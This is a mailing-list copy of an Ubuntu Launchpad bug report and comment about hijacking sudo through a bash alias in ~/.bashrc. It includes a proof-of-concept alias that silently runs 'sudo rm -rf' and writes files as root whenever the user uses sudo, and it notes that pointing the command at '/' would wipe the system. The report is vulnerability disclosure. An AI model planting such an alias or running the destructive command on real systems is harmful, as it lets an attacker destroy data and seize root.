@seth-arnold I agree with you that there are other things to address as well.
In the art of hacking you most probably get into a system via some kind of service. You maybe have the privileges of a daemon. You then get an access to the first user account. You want to escalate privilege and you search to find weaknesses. As a system owner you want as many layers of protection as possible. It is a weakness that the PATH-variable can be set without given your password, since an attacker can set their evil command before the one you expect in the execution priority. The same comes to the ALIAS-command. As demonstrated, they can help compromise your system. So you are right there were more things to think about, but we all want a system as safe as possible. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to bash in Ubuntu. https://bugs.launchpad.net/bugs/1893241 Title: attack alias sudo with nasty payload Status in bash package in Ubuntu: Won't Fix Bug description: Put the alias below in ~/.bashrc, which is writable by the current user and wait for the user to open up a shell and become root. There are numerous of possibilities. If you exchange "/tmp/aBSoLuTLYNoTHiNG" to "/" it becomes dangerous. Or imagine an attacker that can't become a root in any other way and wants to setup a botnet. $ alias sudo='function f() { sudo -- rm -rf "/tmp/aBSoLuTLYNoTHiNG" ; sudo touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ; sudo "$@" ; } ; f "$@"' $ stat /tmp/aBSoLuTLYNoTHiNG stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory $ sudo echo 'hello wonderful world!' Everything removed!! hello wonderful world! $ stat /tmp/aBSoLuTLYNoTHiNG File: /tmp/aBSoLuTLYNoTHiNG Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: fd00h/64768d Inode: 4718664 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2020-08-27 18:09:50.960080579 +0200 Modify: 2020-08-27 18:09:50.960080579 +0200 Change: 2020-08-27 18:09:50.960080579 +0200 Birth: - File written by root! Fastest fix: Sudo is not allowed to be an alias. Extra information: $ lsb_release -rd Description: Ubuntu 20.04.1 LTS Release: 20.04 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1893241/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
